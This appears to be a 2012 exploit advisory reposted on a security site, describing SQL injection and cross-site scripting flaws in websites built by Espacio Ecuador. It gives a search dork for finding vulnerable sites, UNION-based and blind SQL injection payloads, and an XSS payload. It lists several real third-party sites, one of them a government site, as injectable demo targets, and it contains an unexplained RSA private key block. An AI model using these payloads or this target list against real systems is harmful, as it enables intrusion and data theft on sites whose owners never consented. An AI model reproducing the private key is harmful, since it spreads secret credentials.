Espacio Ecuador Cross Site Scripting & SQL Injection

2012.11.30
Credit: Ur0b0r0x
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Facboo: fb.com/omartaurus # Email: ur0b0r0x_@live.com # Line: GreyHat # Home: http://cyberpunk-ur0x.blogspot.com/ # Exploit Title: Espacio Ecuador - SQL Injection / Cross-Site Scripting Vulnerabilities # Dork: intext:"developed by Espacio Ecuador" # Date: 28/11/2012 # Author: Ur0b0r0x # Url Vendor: http://www.magazinavolar.mil.co/ # Vendor Name: Espacio Ecuador # Tested On: Backtrack R3 / Linux Mint # Type: php ------------------- Agreement -------------------- [23/11/2012] - Vulnerability discovered [27/11/2012] - Vendor notified Dont responsed [28/11/2012] - Public disclosure -------------------------------------------------- # Expl0it/P0c ################### http://site.com/*.*?id= < Sql Vulnerability Path > http://site.com/*.*?id= < Xss Vulnerability Path > # Exploit/Comand/Sql=> +union+select+1,2,3,4,--+ # Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");> # Payload/Comand/Sql=> (CHR(58)||CHR(104)||CHR(121)||CHR(122)||CHR(58)||(SELECT (CASE WHEN (1937=1937) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(121)||CHR(106)||CHR(122)||CHR(58) AS NUMERIC) # Demo_Xss_Sql_Vulnerabilities http://www.cnac.gob.ec/personal-detalle.php?idper=1' http://www.andes-explorer.com/ecuador-hotels/hotel.php?id=120' http://www.mytripecuador.com/esp/hoteles-ecuador/hoteles.php?id=24' http://www.galapagoscruises-ecuador.com/esp/cruceros-galapagos.php?id=2' -----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi 2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8 GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/ WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R 8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM 8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/ -----END RSA PRIVATE KEY-----

References:

http://cyberpunk-ur0x.blogspot.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top